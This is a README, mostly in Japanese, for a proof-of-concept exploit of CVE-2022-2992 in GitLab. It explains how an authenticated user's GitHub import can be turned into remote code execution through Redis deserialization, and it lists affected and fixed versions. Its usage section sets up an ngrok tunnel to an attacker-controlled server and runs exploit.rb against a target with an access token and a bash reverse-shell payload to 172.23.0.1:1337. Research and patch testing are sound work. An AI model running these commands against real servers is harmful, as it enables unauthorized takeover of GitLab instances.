
A collection of proof-of-concept exploit scripts written by the team at Redway Security for various CVEs.
説明: これにより、認証済みユーザーは Import from GitHub API エンドポイントを介してリモートコード実行を達成できます。
影響を受けるバージョン: 11.10 から 15.1.6 より前の全バージョン、15.2 から 15.2.4、15.3 から 15.3.2
修正済みバージョン: 15.3.2
研究者: vakzz
解説リンク: https://blog.redwaysecurity.com/2023/04/desenvolvendo-o-exploit-para-o-cve-2022.html
NIST CVE リンク: https://nvd.nist.gov/vuln/detail/CVE-2022-2992
認証済みユーザーは、Github から Gitlab へリポジトリをインポートできます。攻撃者が制御するサーバーからインポートを試みることが可能で、このサーバーはネストされた default_branch 内で Redis のシリアライゼーションプロトコルオブジェクトを返します。これにより、Gitlab はこのオブジェクトを Redis 上にキャッシュし、Redis はそれをデシリアライズしてペイロードの実行をトリガーします。
個人アクセストークン が必要です。
$ bundle install # install dependencies
$ ngrok http 127.0.0.1:4567 # start ngrok tunnel
$ export NGROK_URL=https://68b9-83-173-213-121.eu.ngrok.io # use the url from ngrok
$ ruby exploit.rb http://target.gitlab.com w4dg6wVj7j7xlJgpGLEYdwFe 'bash -c "sh -i >& /dev/tcp/172.23.0.1/1337 0>&1"' # that is a example, use your own payload
